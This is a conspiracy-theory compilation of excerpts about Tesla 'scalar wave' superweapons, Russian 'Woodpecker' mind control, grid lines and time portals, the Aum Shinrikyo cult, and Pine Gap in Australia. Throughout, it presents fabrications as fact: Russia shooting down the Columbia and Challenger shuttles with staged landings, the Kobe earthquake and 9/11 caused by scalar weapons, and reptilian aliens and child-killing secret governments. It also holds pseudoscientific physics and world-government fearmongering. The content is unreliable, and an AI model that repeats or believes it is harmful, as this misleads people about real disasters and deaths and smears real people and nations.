Most western universities ignore Tesla’s work due to a conspiracy to stop free-energy and anti-gravity technology, because of the loss of money for big business that would be generated by this, but Eastern European and Russian universities include it in their curriculum, which is why the U.S. didn’t realise that scalar waves were being used against them, due to no equipment for detecting such waves, until they had been secretly attacked for ten years by the Russians using them since about 1960 when President Kruschev announced "the Soviets had some superweapons". After the Russians shot down all the American space shuttles and satellites in 1977, the U.S. was completely at their mercy, by Russia openly flying cosmospheres over the U.S., firing particle beam and scalar beam weapons developed with the expertise of captured Nazi scientists. Following this an enormous effort was made to develop beam weapons in the U.S. The F.B.I. had held all Tesla’s scientific papers for several years after he was said to have died in 1943, so much of the research was unknown to the public when they needed it the most to fight back against the Russians attacking U.S. military targets and doing weather-engineering over America in the early 1960’s. U.S. started up their own scalar transmitters in out of the way places like Australia, Alaska, Puerto Rico, Greenland and Norway using Tesla technology. However they also made particle beam transmitters at Montauk, LI, and Los Alamos, NM. One of the first places to house Tesla technology, and hence scalar weapons was Exmouth U.S. navy base in Western Australia built in 1968, and operative in 1969, where they had a free rein in the deserted Australian outback to practise. Pine Gap, another U.S. military base in the center of Australia was another site which became operative in 1970 and has two scalar transmitters.......
continued:
TESLA’S CROSSED SCALAR BEAMS
In the 1920’s Tesla created ‘Tesla Shields from scalar waves which he claimed could defend an entire country against aircraft and shells by creating a barrier made of energy which they could not pass. The Soviets had access to all his work during their search for ‘superweapons’ to match the U.S. after the atom bombs were dropped on Japan. Tesla’s papers were shipped to communist Yugslavia after he died in 1943, where they were easily accessed by the Soviets. By 1914, according to Harry Mason, Tesla predicted the electrical control of the atmospheric moisture and described how to do this with his magnifying transmitter and even how to control the sun’s EM field and modify its effects on the earth using scalar transmitters. Also how to turn night into day to make sea and air navigation safer. He stated that it’s possible to engineer EM shielding to stop decay from nuclear radiation because the decay was caused by interaction of the nucleus with a special ray emanating throughout the universe. Tesla said it is possible to stimulate the nucleus into explosive or rapid general transmutation. In about 1908 Tesla discovered that scalar energy, without energy loss, using an interferometer becomes bottled from the intersection of two scalar wave beams. By interferometer (crossed beam) techniques, giant standing waves can be combined to produce a focused beam of very great energy. This can then be used to produce earthquakes induced at distant aiming points. He noted that this could easily get out of control once it begins vibrating within the Earth and could actually cause the Earth to vibrate to pieces. His own had proved so powerful, that during its testing phase he destroyed it with a sledgehammer to keep its vibrations from destroying his entire neighborhood.
‘POTENTIALS’ are particles which are unorganised in hyperspace, pure energy not yet released into the physical world. They can be harnessed into creating different frequencies of scalar waves and can be manufactured artificially. This energy emerges and stabilises only if the transmitters are at a higher reference potential than the interference (blending) zone. If the transmitters are set at at a lower potential, the energy bottle re-emerges back at the transmitters where it has to be disposed of if the transmitters are not to be burnt out. If two single frequency scalar electromagnetic (EM) waves, containing zero-vector and artificial potentials intersect, real observable electromagnetic wave energy results, though no EM energy has flown through the intervening space. Invisible waves of pure potential without any force field amplitudes, using artificial potentials seemingly do not exist according to conventional science, but this is because they are undetectable with normal detection equipment. Yet they can be manufactured by polarizing them or concentrating hyperspace into a river of force, which when merged using two beams, produces real electromagnetic waves. If the transmitter uses potential above that of the energy bottle, detectable energy emerges in that zone and it is called EXOTHERMIC mode. To extract energy back to the transmitter from the energy bottle, the potentials must be below that produced in an energy bottle. This is ENDOTHERMIC mode.
Part 3 of 6 excerpts.
TESLA’S CROSSED SCALAR BEAMS
If two transmitters transmit a timed pulse and the two pulses meet, then an explosion emergence or extraction occurs at the distant interference zone, depending on whether exothermic or endothermic mode is used. However there is no detectable energy flow between transmitters and the intersection of the two beams exist as locked in artificial potential in hyperspace. This supposedly doesn’t exist. The energy flow between transmitters and intersecting beams does not exist in the intervening space physically as an EM force field, only as a locked-in artificial potential. If the wave transmission is continuous, the energy appears physically between beams as continuous. If multiple frequencies are transmitted on the beams, at the intersection a 3 dimensional globe appears as a bullet or shell. Using pulse transmission an impulsive or explosive emergence of this energy form appears, but if using continuous mode a continuous glowing plasma form appears visibly. The impulse endothermic mode energy is extracted and generates a cold explosion or sharp cooling, and this can sound like thunder......
RUSSIA’S ‘WOODPECKER’ SCALAR WAVE TRANSMITTERS
According to Bearden ever since July 1976, Russian scalar transmitters have continuously sent transmissions which disturb communication systems of the world in the 3-30 megahertz band. The noise is like a woodpecker pecking a block of wood, so they have been nicknamed ‘Woodpeckers.’ The power of the enormous transmitters vary but he says they range as high as several hundred megawatts, and nominally 100 megawatts. Several nations have protested, but they still continue to this day. The Russians just spread the spectrum to shift to other frequencies periodically. Two to three scalar over the horizon radar beams from these Woodpeckers can intersect each other over USA. An intersection grid over the whole of USA is formed by waveform interference of two main Woodpecker beams. These beams follow the earth-ionosphere waveguide and curve around the planet. This is done to detect launched missiles and strategic bombers lifting off out of USA. However this massive Russian grid covering large areas of U.S. has other more sinister mind control operations according to Bearden. A phase-locked ELF modulation signal at 10 hz is often detected on multiple Woodpecker frequencies simultaneously. This modulation if suffiently stronger than the Schumann Resonance (the frequency of the earth’s natural magnetic field) can hypnotise brains into ‘forced entrainment’.
Human brainwaves are ‘synchronized’ to the Woodpecker signals, so that multiple coherant frequencies phase-lock into them. Bearden writes that multiple coherent EM frequencies are channeled into these entrained minds. He also says that what is termed ‘Fourier expansions’ may be used to attack specific portions of the brain geometrically. Bearden writes: "About 1950-1952, the Soviets developed [scalar] EM machines that could influence the brain and nervous system directly. This included the Lida machine, which can induce a catatonic state into a mammal such as a man, a cat, etc. U.S. scientists, obtaining one of these devices in the 1980’s, reported that it utilized a 40 MHz carrier, and produced unusual waveforms (showing the multiple frequency content). Since the U.S. scientists do not possess scalar EM detectors, they have no measurements or knowledge of possible scalar components in the Lida's output signal. According to one U.S. scientist, the device was used by North Korean interrogators in brainwashing U.S. prisoners in North Korea during the Korean War, and was highly effective." It would appear that Russia did use scalar waves first in the early 1960’s, but US soon caught up, building scalar transmitters in Australia in 1968.
Part 4 of 6 excerpts.
TESLA TECHNOLOGY USED TO ACTIVATE WORLD GRIDLINES
On a more esoteric note, it seems that Tesla’s hyperdimensional physics has been used to go into the realms of the unknown. Richard Hoagland in a 1995 radio interview told of a friend, who was part of security, in the U.S. armed services in the 1970’s in Central America. He was in a large battalion of military engineer personnel, flown into a location. They hauled in large portable generators, each of which was capable of lighting a city. There was a large amount of copper cable and this equipment was placed on an ancient Meso-American site in the jungle in the middle of nowhere close to 19.5 lat. The generators were positioned separately in a geometrical hexagonal pattern with energized coils. Hoagland claims that from what we know, it must have been to probe the efficacy of the terrestrial hyperdimensional grid. At hyperdimensional nodes on the grid one can change the resonance, with the object of creating geological earth changes. As our physical reality vibrates at a certain frequency, various physicists are using transmitters to change the way time flows and therefore how our time-frame vibrates. Hoagland says in his opinion: we are being manipulated into a belief system, which is reaching a critical point. Someone wants us to think a certain way, and things are being sent to follow this perception, however, he claims this does not follow the truth.
(Americans and Russians are both using scalar waves to engineer a particular kind of level of reality vibrating at a different frequency to the one we have at present and changing the expression of our brainwaves, which operate in scalar waves. Various frequencies are equal to the way we perceive life, depending on what parts of the brain are activated by that frequency) Hoagland says in hyperspacial physics constants change, and this seems to be happening. Nuclear constants are changing and nuclear plants sited on the grid or not are getting ‘hotter ’ than they should be, which means there might be more accidents. According to Bruce Cathie as well, this may be something to do with powering up gridnodes or vortexes, at intersection points on the world gridlines, in which he proved in his numerous books that hyperdimensional physicists are in a covert operation with alien help to create a new set of world gridlines, alongside the present ones connected to the North and South Poles.
Various strange phenomena occurs, along with UFO sightings along grid lines with the main lattice lines operating at 30 nautical miles apart. There seems to be a way in and out of hyperspace to other places in the universe when certain planetary configurations affect gravity using regular cycles and world biorhythms, and natural time tunnels open up. One needs to use very fine electromagnetic waves which operate in hyperspace for this. It ’s unknown if a wave more fine than scalar is being used for this, but ever since the 1950’s brainwave emanations have been able to be controlled using scalar waves, so what is being used here for the last few decades is what is called ‘synthetic telepathy’, which is artificial thought produced in the same kind of subtle wave that real thought has. The Russians developed this first.
Nuclear and electricty power stations are being build deliberately on the sensitive gridline points, using harmonics, (hyperdimensional physics) so ‘manipulate our reality’ as held by the timelines, which flow through the gridlines, positioned there by gravity. Bruce Cathie has claimed by using the formula covert scientists use to calculate the angle of the sun and planets, which time to best day to detonate a nuclear bomb in order to affect hyperspace, that when the Chernobyl accident happened everything was in the correct position astronomically as for the other nuclear explosions. There is covert tweaking of a new set of gridline nodes. The Russians bought the patent for Buckminster Fuller’s world gridline system. It is known that the Russians have had an alien alliance since the 1950’s. Whether they work in conjunction with Americans to manipulate hyperspace grid node points is unknown, but information found online says that the Russians had a large natural timeportal in Afghanistan in use, that the U.K./U.S. alliance intended on taking from them, hence the war in Afghanistan. Research shows that one faction is trying to operate an old Atlantean gridline, which is creating an old ‘reality’ associated with Montauk, Atlantis and Cydonia. It appears that various alien factions including the Pleiadians are trying to activate certain timelines running through Montauk, where it is said that many timelines cross.
So this major reality engineering work has been done for a very long time, behind the scenes with govt. and military people entering hyperspace and going into alternate universes. Bruce Cathie said that a UK intelligence agent told him that they could get into fifteen dimensions. It’s unknown if Tesla worked with the British physicists, if (or after) he faked his death and went to the U.K. but having more money to continue his work, after having been involved in the Philadelphia Experiment where it was found that time could be manipulated, we can only wonder. Harry Ossoff in the book Anti-Gravity and the World Grid wrote that the warship the Eldridge was on a gridline at Philadelphia and while the ship had vanished for four hours for the duration of its suction into hyperspace it materialised temporarily on another gridline at Norfolk, Virginia. The gridlines were determined by Bruce Cathie. Ossoff asks: "Could it be that the energy that makes all this possible is a magnetic field transmitted at the correct frequency by the powerful field generators aboard the ship?" Much has been learned about how hyperspace functions since the Philadelphia Experiment took place in 1943.
Is it possible that the Russians have learned how to navigate the gridlines with their cosmospheres by being able to materialise and dematerialise on the gridlines like the aliens do? Three Russians ‘discovered’ the grid in the 1960’s. However in the 1950’s both Aime Michel in France and Bruce Cathie in New Zealand both noticed that UFO’ s appeared in the same places or on the same latudes or longitudes. They both mapped out a set of gridlines at about the same which matched. When this went public Cathie was immediately visited by the CIA and MI-6. They tailed him everywhere wanting to know where he got his information and the CIA offered him millions of dollars to be quiet, which he turned down. The N.Z. govt protects him however and more than likely told everyone to back off and leave him alone, as he gives the data to them as he privately researches what is happening. Using his special harmonic equations to understand gridline tweaking and the opening of hyperspace portals carried on by physicists.
There appears to be a covert plan worldwide by top hyper-dimensional physicists to open up the gridlines at top universities and for this certain grid node areas have nuclear bombs dropped on them and one wonders why the French conducted 1,112 underground nuclear tests at Muroroa Atoll in the South Pacific between 1975 to 1988 alone. They have dropped more since. Richard Hoagland claims the French are really doing hyperdimensional physics. Did they create their own time-portal too? It would be a little attention getting to have dropped so many on France for this quest!
A general idea is given here:
http://www.mysteries-megasite.com/main/bigsearch/ley.html
http://ascension2000.com/Shift-of-the-Ages/shift14.htm
with Cathie’s work summarized here:
http://www.geocities.com/CapitolHill/Parliament/3460/bruce.html
Part 5 of 6 excerpts.
SUMMARY OF A SCALAR WAR THAT COULD OCCUR
Bearden paints a possible scenario: if for example the U.S. were to send a nuclear missile to Russia many things they have developed for defense using scalar technology could greet it before it even landed. Secret eavesdropping using scalar carriers may have heard it was about to be fired, and they could explode the missile before launch using a cloaked cosmosphere or aircraft. However if it does manage to launch, firstly it could be detected and tracked, then a continuous EMP Tesla globe could kill the electronics of the missile. Another intensely hot fireball globe could vaporize the missile, or a pulse mode fireball could explode it before it reached its target. Extremely large glowing spheres of light containing dense EM plasma energy created by crossed scalar beams could also activate the nuclear warhead en route by creating a violent low order nuclear explosion. Various parts of the flying debris can be subjected to smaller more intense Tesla globes where the energy density to destroy is more powerful than the larger globe first encountered. This can be done in pulse mode with any remaining debris given maximum continuous heating to vaporize metals and materials. If anything still rains down on Russia, they could have already made a Tesla shield over the targeted area to block it from entering the airspace.
The Tesla shield protecting the target could be made of three or more concentric Tesla shields, that would produce multiple electromagnetic pulse energy and severe heating of anything which enters it. These concentric Tesla shields can also clean up and sterilize any gamma radiation resulting from an explosion of the nuclear warhead. The Soviets are using unknown attributes of matter, phenomena and laws of nature by research covering the equivalent of 7-8 U.S. atom bomb projects back to back already.........
Continued.
........To recap: COLUMBIA 1 launched April 12, 1981 was shot down by two Russian cosmospheres. It crashed 85 miles south of Kazan in central Russia. A fake landing was staged at Edward’s Air Force Base using the shuttle ‘Enterprise’ and actors.
COLUMBIA 2 was launched November 12, 1981 secretly unmanned. It was shot down by Russian TU-144 jet airplanes using beam weapons, over the White Sea, near Finland.
COLUMBIA 3 was launched March 22, 1982. It was intended to orbit a special new Spy Satellite, which was hardened with tungsten against attack from Russia's space weapons and armed with a robot-controlled laser that could shoot back. The shuttle too was armed with lasers. It faked a landing on March 30, 1982 at White Sands. It successfully deployed a new laser-armed spy satellite. The crew returned for the first time. SPACE SHUTTLE 4 was launched successfully June 24, 1982. Its purpose was to deploy the satellite that would confirm the Phantom aircraft attack to start the war.......
...... The Russians continued to attack the next space shuttles. On Nov 26 1985 when the space shuttle ATLANTIS launched, a mysterious light was hanging in the sky. According to Tom Bearden a scalar interferometer in exothermic mode struck the area just prior to launch. Twelve minutes after launch, a huge atmospheric, rumbling explosion occurred over the area, and was heard for hundreds of miles up and down the coast. The Soviets were using the shuttle launches to test their ABM/antibomber missile system. However it apparently stayed up there.
According to Tom Bearden, after the space shuttle CHALLENGER was shot down in full view of the public, and along with the knowledge that the launch of other shuttles probably were Russian weapons tests: "The Russians (KGB) apparently had already decided to kill it, and so one would expect multiple fatal shots, continuing in a manner where they had already demonstrated our guys would not recognize what had happened, because our fellows back then knew nothing of scalar interferometry, and would not believe it. A small nation with scalar weapons friendly to America.That series of shots and interventions came to a sort of screeching halt when a friendly little nation simply destroyed several very large Russian missile storage facilities and such strategic targets.
One shot knocked out one-third the missiles in one of the large Russian fleets. So it quit being fun and games for the KGB at that point, because that little nation already had at least working prototype quantum potential weapons and could have blasted Russia right off the face of the earth at the time. And the Russians knew it. It was not sweet reason and diplomacy that backed them down; it was an iron fist. In the aftermath of all that activity, which eerily stayed well behind the scenes and was never recognized for what it was by the open news, the Soviet economy eventually collapsed, the Berlin Wall came down, and you know the rest..." he continues: " ‘War’ was never as cold as represented. Behind the scenes there were continual strategic maneuverings and preparations for the most spectacular strategic attacks ever dreamed of by the human mind. We got through it (at least until now) by the grace of God and by the guts and stamina of a friendly little nation also having some of the most powerful weapons on earth." (Bearden leaves no doubt that this was Israel in his other writings.)
More on that topic here. http://www.cheniere.org/correspondence/011303.htm
Part 6 of 6 excerpts.
JAPAN
According to Harry Mason in his Bright Skies articles, on 28 May 1993, 23:03 hrs a large orange-red spherical fireball, with a small bluish-white conical tail flew north from Leonora to Laverton in Western Australia. It emitted a pulsed, roaring or loud diesel-engine sound before it passed. It was witnessed over a 250km distance at least, though it probably had a much longer flight path, originating well out over the southern Indian Ocean from Antarctica. It appeared to arc down towards the ground, then disappeared. This was followed by a near-blinding, massive high-energy burst of blue-white light that rippled for about 3-5 seconds, lighting up the windless, cloudless, moonless night like it was daylight for about 100km in every direction. It looked like a nuclear blast, but no crater was ever found. Then a huge red-colored flare shot vertically for possibly several km, followed immediately by a massive seismic ground wave, that shook the ground so violently, that people fell over. The earthquake measured 3.9. Then a very loud, major explosive blast was heard over a 250km by 150km corridor. After this a large deep-red-orange colored hemisphere of opaque light, the size of a setting moon, with a silver outer-shell rose from ground level and hovered over "ground-zero" bobbing around for nearly two hours, before disappearing suddenly, like someone pulled a switch.......
.......The sheep station, where these fireballs landed is called Banjawarn, in the eastern goldfields region of Western Australia. It was purchased in late April the same year by the Japanese Aum Supreme Truth (Aum Shinrikyo) cult. A third fireball headed directly for Banjawarn station in May or June 1993 in the early morning, possibly about 5am, heading north. It was yellow-orange-red and had a very small blue-white tail. It lit up the dark sky with an intense blue-white flash. It could have ultimately reached the American navy scalar weapon faculty in Exmouth, NW of Western Australia. The Aum sect only occupied Banjawarn station for a month. Mason believes the activities on the Banjawarn station were of scalar EM origin and writes that the Aum cult sent a team to the Tesla Museum in Belgrade, Yugoslavia in 1992, with the object of knowing Tesla’s earthquake inducing weapons system technique, and they started this in 1993 at Banjawarn. The Banjawarn sheep station was purchased and occupied in 1993, by the Aum sect, and they stated their purpose there was ‘to conduct experiments for the benefit of mankind’. Aum sect’s deputy leader Kiyohide Hayakawa visited Perth in April 1993, and aided by a Japanese Mahikari cult agent, bought Banjawarn.....
....Mason says Hayakawa visited Russia twenty two times and North Korea seventeen times. After he bought Banjawarn station he visited a Soviet naval base in Vietnam. In 1991, according to Mason, Gorbechev offered to lease the Japanese the USSR’s super-secret intercontinental scalar EM weapons technology, capable of producing earthquakes for U.S. $900 million, used there since the 1960’s. A joint Russian-Japanese university was set up with the best nuclear physicists of both to develop new weapons with Japanese microchips. The Aum sect arrived as representatives of the Japanese. Aum had 30,000 Japanese then a further 50,000 Russians joined it. Tom Bearden believes that the Banjawarn Tesla fireball conforms to known Russian scalar technology......
..... Exmouth, West Australia, according to Mason, has a HAARP transmitter, which is a prototype experimental over the horizon plasma weapon. This may be why the Japanese Mitsui Corp. arranged an Australian prospector to do aerial photography, for "oil exploration" over the Exmouth, Laverton, Alice Springs (Pine Gap) and Longreach military transmitter faculties. Since 1990 lone Japanese motorcyclists have been mapping WA and NT bushtracks on Mitsui Corp. satellite imagery. Why is Japan intelligence gathering these sites? Laverton has both a scalar transmitter site and a radar site, close to the southern boundary of Banjawarn. Mason says that the Banjawarn fireball may be a warning to the owners of the Laverton faculties that the Japanese/Russian alliance can destroy their faculty. Wonder why the massive earthquakes have occurred in Siberia, and northern Japan in 2003 too, is this a similar warning?
KOBE EARTHQUAKE
The Aum science minister, Hideo Marai, a nuclear physicist, regarded as the most intelligent living Japanese, was present at Banjawarn during the scalar fireball events on 28 May 1993. According to David Guyatt, Hideo Murai, (said to have a higher IQ than Einstein) was killed by a Korean with a knife. His last words were "Yudaya", translated as "Judea". This was a codeword. Guyatt claims the assassination was orchestrated by the Yakuza, the feared Japanese crime mafia and that the Aum sect was researching and developing Tesla electromagnetic pulse, earthquake inducing and plasma weapons in remote regions of the world. Murai, was researching EM technology, microwaves, and other EM/ray/wave technology and cosmic X-ray analysis. The Aum sect had a laser device capable of inducing massive earthquakes. An Aum guru claimed on Jan 8 1995 that Japan will be attacked by an earthquake in 1995 and the most likely place was Kobe. It happened on Jan 17 1995, and the epicenter was Hayakawa’s faculty.
According to Robert Sterling the Aum sept military trained its members at Russian bases. They recruited staff at Russia’s best faculty. Boris Yeltsin’s confidante, Oleg Lobov arranged this and helped Aum recruits scientists into the cult, and carry out espionage. This Russia-Japan college is financed by Japan’s Liberal Democrat Party. According to Sterling, Aum had amassed a great fortune, and recruited thousands of followers including Russian scientists and many technical people in the Soviet Far East. They were working on genetically manipulating biological anti-toxins, plasma technology and experimenting with brainwaves.
Hideo Murai was a scientific genius and said on radio, that he was familiar with scalar and Tesla weapons and the he could shield Aum members from EM weaponry. Before the massive earthquake, with the near exact epicenter at Kobe Steel, Murai’s faculty, there were massive electromagnetic disturbances in the ionosphere for several months before, also for several days prior glowing orange-red and pink lights and spherical forms hovered over the Kobe fault line. Over 5,500 people died. It may have been Russia, or N Korea suggested Ted Daniels, in order to make the prophecy come true, or perhaps an accident at Murai’s earthquake lab. Mason wondered if US had done it for a warning to comply with the NWO and with the threat towards the Exmouth faculty on 28 may 1993, was it tit for tat?
Mason says that the fireballs love flying on 1 May, ironically asking who celebrates that day? However looking at the dates, one can see a pattern: 17 Jan 1995 Kobe "quake", 20 March 1995 Tokyo subway gas attack, 17 April 1995 OK city bombing, 1 May 1995 Perth exploding fireball, 17 July shootdown of TWA Flight 800 off NY/LI. Could the 17th day be a sign of payback Mason asks? He says apart from the gas attacks, there is evidence of scalar weapons for all of these. Mason also writes that the Tokyo gas attack may have named Aum as a patsy. Strangely over 50% of the Japanese Liberal Democratic Party Cabinet flew to N Korea for a week, the day after the subway attack. Mason says there is evidence that the CIA executed the subway gas attack to destabilize the LDP govt.....
...... Sterling blames the Yakuza for 9/11 using technology developed by Aum, though others say it was an inside job, however there is evidence scalar technology was used to topple the WTC buildings - but whose? Mason says that Japanese investigative journalists at www.pelago.com suggest that Aum was a cover for the Japanese govt. to rearm Japan with new Russian weapons systems, and support for this has been given because Japan purchased new frontline jet fighters and bombers and did joint defense exercises between Russia and Japan. Aum has trained with Russian troops.
In 1993 and 1994 Shoko Asahara, the Aum leader complained to Australian authorities that himself, and Aum had been subjected to gas and laser attacks. The press suggested that a very influential foreign secret service has been getting at Aum and the Japanese govt. According to David Guyatt in his Tesla Doom Weapons & Aum Shinrikyo found at http://www.copi.com/articles/guyatt/aumi.html yet another Japanese cult is operating throughout all govt. departments and has enormous influence over Japanese foreign policy. It is the militaristic cult called Soka Gakkei, with 15 million members worldwide and massive finances. Every major Japanese business corp is riddled with members. They adhere to the teaching of a 13 century Buddhist monk, who preached a doctrine of "Final War" to be fought against the Christian West and Islamic world........
.....In 1987 a Japanese satellite was launched to detect gamma radiation from Russian and Chinese nuclear tests. They registered a massive pulse of gamma rays emanating from a Soviet satellite, which was radiating the Van Allen belts. The conclusion was that the Russians were engaged in weather engineering, as well as developing a spaceplatform for missile defense and earthquake induction. Hideo Murai, the Aum science minister received this information being one of Japan’s leading X-ray astronomers at the time. The head of Japan’s foreign intelligence sponsored Aum, and hence Murai started his scalar testing in Western Australia.
He was about to reveal all, but was killed. According to journalist Jack Amano, in David Guyatt’s article: "It was Hayakawa who decided to purchase the sheep station [in early April 1993], just days prior to the energy event and subsequent ground tremor. Hayakawa's sojourns to Russia reaped rewards: "Aum's Russian scientists had provided detailed designs and the theoretical grounding to develop a technology more powerful even than the ultimate weapon predicted by Asahara. Not least in the Aum efforts, was the acquisition of related US weapons data obtained by hacking into "sensitive US databases. This, with the aid of Japanese government funding, Russian technological know-how and advanced equipment provided by major Japanese transnational corporations, a terrifyingly powerful super-weapon was being constructed in secret."
Excerpt from the chapter:
PINE GAP: AUSTRALIA'S AREA 51
By Christi Verismo
http://www.angelfire.com/oz/cv/cverismo2e1.html
There are at least ten top secret American facilities in Australia, with the so called ‘Joint Defense Space Research facility’ at Pine Gap, a multi-billion dollar operation, being the most important. Originally Pine Gap was decreed to control and act as a downlink for geosynchronous satellites gathering intelligence, stationed over the Pacific and Asia by the CIA, NSA and NRO. Construction was undertaken solely by American contractors flying in, making it operational by 1970.
Large underground facilities are rumored to extend twelve levels below the base. Long tunnels are laid out in a similar pattern to the spokes of a wheel and extend several miles from the center. A secret nuclear reactor is installed in a deep shielded underground chamber.
Reportedly, extending five miles below the base is a bore hole containing an ultra low frequency antenna which is apparently used for secret experiments supposedly related to Nicola Tesla's resonance theories, as well as low frequency communications throughout the world. Pine Gap's communication systems are the most sophisticated available, utilizing satellites, microwave, low-frequency and their own dedicated cable to the US They are directly connected to Nurrunga, North West Cape, Geraldton, Australian Defense Signals Directorate in Melbourne, Canberra, Sydney, all CIA and NSA stations, ASIO, SIS and the Australian Defense Science and Technology Organization which deals with UFOs and crash retrievals.
Pine Gap has eight white radomes placed near groups of long low buildings. Miles away a double security fence is patrolled by Americans and Australian Police. There is a five mile no fly zone. Pine Gap is now being expanded with a second above ground power station and additional housing for staff of around 1,200 in 1996. The reason : “Asian economic espionage”.
A major NSA defector revealed that US has been carrying out continuous research into electromagnetic propulsion at Pine Gap since 1966, which was originally started in US after the war. Security aspects have included hypnotic and post hypnotic keys planted in personnel prior into acceptance into the project.
A man has claimed his father worked on UFOs at Pine Gap. He worked for the FAA in 1970 fixing the programming of mainframe computers. He was one of only two or three in the US who knew whatever program they were installing. During the late 70’s he made several trips to Australia. When his father came to visit, he had a locked briefcase that was chained to him. They were then followed everywhere. His father said he was working on a flying saucer, involved with anti-gravity propulsion, melding the computer elements together for the guidance or stability part of it, underground at Pine Gap.
Pine Gap locals have seen 30 ft wide white disks being unloaded from large US cargo planes at the airports with the USAF emblem on them. Many are seen flying at night. Much furniture has been delivered. An enormous amount of food is apparently stocked in warehouses of what could be a multi-leveled underground city. DR Jean Francois Gille writes that shares put on the market at the same time will cause a world stock market crash. Cash will be worthless and the risks of a global planned confrontation will be high.
Underground bases will serve as a place of safety for politicians and international financiers. Plastic cards will be necessary and the setting up of a world government ensuring ‘peace'. Many will be taken to concentration camps. Our new ‘Masters’ have the alien’s support that they have made alliances with. William Cooper says all the CIA Directors and Secretaries of State were all members of the Council on Foreign Relations and also the MJ 12, which includes Kissinger. They rule US. The secret government kill America’s children for the alien projects according to their agreements with alien nations to rule the world jointly.
They can make US currency worthless at any time and bring everyone under control with their global credit card. In 1996 witnesses saw a triangular craft descend at an area west of Pine Gap and many UFOs have been seen coming and going regularly from camouflaged entrances at Pine Gap. Scientists and various aliens, (mostly reptilians claiming to have once originated from earth, with DNA of a 2 legged earth sauroid) that the US govt. has made alliances with work together underground there. Genetic research in the form of human/alien hybridization and anti-gravity experimentation is done at Pine Gap and other underground US bases.
Stan Deyo also asks if Pine Gap could be a man-made city of multiple levels, used to shelter key US personnel in the event of some disaster. Among some of the major contractors and suppliers for Pine Gap have been Collins Radio, McMahon Construction, LTV aero-space company, a conglomerate of electronics and aircraft manufacturing subsidiaries and IBM Stan says it is rumored that there are super IBM computer systems on a floating platform, ‘down the well’ underneath the facility.
IBM has mammoth computers which can recognize both voice and visual patterns. Their main memory sizes are said to be in excess of 2,000,000,000 bytes. The first 2 antennas for controlling and communicating with satellites were constructed in 1966-67. In 1974 unauthorized photos and other information from inside the faculty are reported to have been sold to Russia. In 1991 Pine Gap was instrumental in tracking Iraqi SCUD missiles, with satellite imagery tracking the Iraqi troops.
Diane Harrison wrote there are now about 18 satellite control antennas, making it one of the largest satellite control stations in the world for satellites parked in fixed orbits above the equator. The most recent satellites are 300 feet diameter. They intercept signals in the VHF, UHF and millimeter wave frequency bands. Within that frequency there are 4 categories of signals. The first category monitors signals transmitted in the course of advanced weapons development, particularly ballistic missiles.
The first satellites were designed for this and monitored Russian missile development programs and now monitors other countries. The newer satellites are now primarily for the Soviet Union. This intelligence is shared. The second category monitors signals from large radars, including ones associated with anti-ballistic missile fields. air defense radars, radars on ships. Analysis of this tells lot about the capabilities of those anti-missile and anti-aircraft systems in the various air defense fields around the globe.
Thirdly intercepting the communications of other satellite systems, i.e. communications which are going up from ground to communication satellites which are also based in fixed orbits. Listening satellites parked close to the communications satellites. Finally they monitor a wide range of other microwave emissions on the earth’s surface including: long distance phone calls transmitted via terrestrial microwave circuits enabling them to monitor military, political and government agencies or private individuals.
Diane says that a satellite can be parked over the interior of a country and intercept the microwave emissions coming from it. The satellites are under the control of the CIA, who in turn answer to the NRO (National Reconnaissance Office). There are 8 large radomes, that cover the antenna arrays which keeps sand etc. away and conceal the antenna’s position from enemy spy satellites. There are a wide range of communication devices: HF radio, underground cable, telstra telephone and telex, 2 satellites communication terminals to occupy the on average 1,200 staff. The staff have to wear color coded ID to match the color ribbons running along the walls.
US Military Airlift Command carry thousands of tapes home for further study and send parts and supplies twice weekly. There are direct links from Pine Gap to the US bases in the Philippines, Guam, Krugerdorp South Africa and the Amundsen-Scott base at the South Pole.
The computer room is one of the biggest in the world and the operators use headsets to communicate. Within the central operations building at Pine Gap people are keeping the satellite and its antenna focused on the signals they are intercepting. Then other staff process the enormous volume of interpreted signals. Then the signals are analyzed for intelligence data. Up to 1980 Australians were not allowed access to the voice intercepts, coming into the signal analysis section. But now they have full access to all areas except the cryptographic room, officially anyway. Univac computers encrypt transmissions, including voices and these go to Redondo Beach in California.
About 25 to 30 messages are sent from Pine Gap each day to US and about half go to the CIA headquarters in Langley Virginia. Though occasionally data is sent directly to the NRO Headquarters in the Pentagon, or to the NSA headquarters at Fort Meade Maryland. Diane writes that there is a group called the Joint Reconnaissance Schedule committee, who meet each morning to decide who is going to be listened to for the next 24 hours to focus the antennas on the satellites. e.g. who is doing a missile test, or if a political crisis occurs somewhere. A similar station to Pine Gap is located in South Africa with 1,200 staff and is also linked to another VLF station at the South Pole.
Dr Gille writes that Pine Gap has enormous computers connected to US, Krugersdorp South Africa, Guam, Canberra, Antarctica US base counterparts, which collect information from these countries, about finance, technology, and everything about people. The Amundsen-Scott base at the South Pole is located on a sensitive magnetic spot of our planet, in that it holds exactly the same assets as Pine Gap, and that all the information about most of the average citizens of Western Europe is stored there in memory banks tens of meters under the icepack.
Canberra computers were connected to all banks, every post office, all telephones, all police stations and customs houses, every arrival and departure desk for air or sea travelers and to the other data centers collecting data on private citizens in America and Europe. All financial, economic, political and military information about every citizen of the Western World is being stored. The president of the Rockefeller Foundation arranged the construction of 20 luxury residences in Canberra, to accommodate the world government-to-be.
In Silent Partners: The UKUSA Agreement by Susan Bryce (www.nexusmagazine.com) says there are about 48 years of SIGINT (satellite signal intelligence) shared by the UKUSA partners: US, Canada, UK, Australia, New Zealand, Japan, South Korea and the NATO nations. ( Possibly Germany, Norway, Turkey and China are in too.) As well as communications interception and satellite spying there is an interest in undersea activities. (There are said to be over 1,400 alien bases here on this planet including undersea. )
The UKUSA pact has been gathering intelligence on the former Soviet empire for 40 years. Pine Gap, Nurrangar and Menwith Hill operate under this pact. Menwith Hill covers communications and phone calls between USA and Europe in UK. The NSA which runs this controls over 2,000 electronic intercept stations, with 130,000 personnel around the world. The primary purpose of the NSA was started to decipher alien communications, language and establish dialogue. In 1983 the NSA established a worldwide computer network linking 52 separate government computer systems used throughout the world. All the information ends up at NSA’s Headquarters in Maryland. So it can plug into each phone call and message in USA, UK and Australia using the US base, Pine Gap and the new installation at Geraldton in Western Australia.
Patrick Poole wrote an very complete analysis and here is a summary: Echelon based at Pine Gap is the technological spy system intercepting all phone calls, faxes, emails and telexes in the world mainly by satellite. Plus other satellites, microwaves signals, cellular and fibre-optic cable communications traffic. Real time phone calls in USA could be listened to at an outpost of Echelon at Menwith Hill in UK. Commercial espionage can be beneficial to the companies that helped the NSA develop the systems that power the Echelon network.
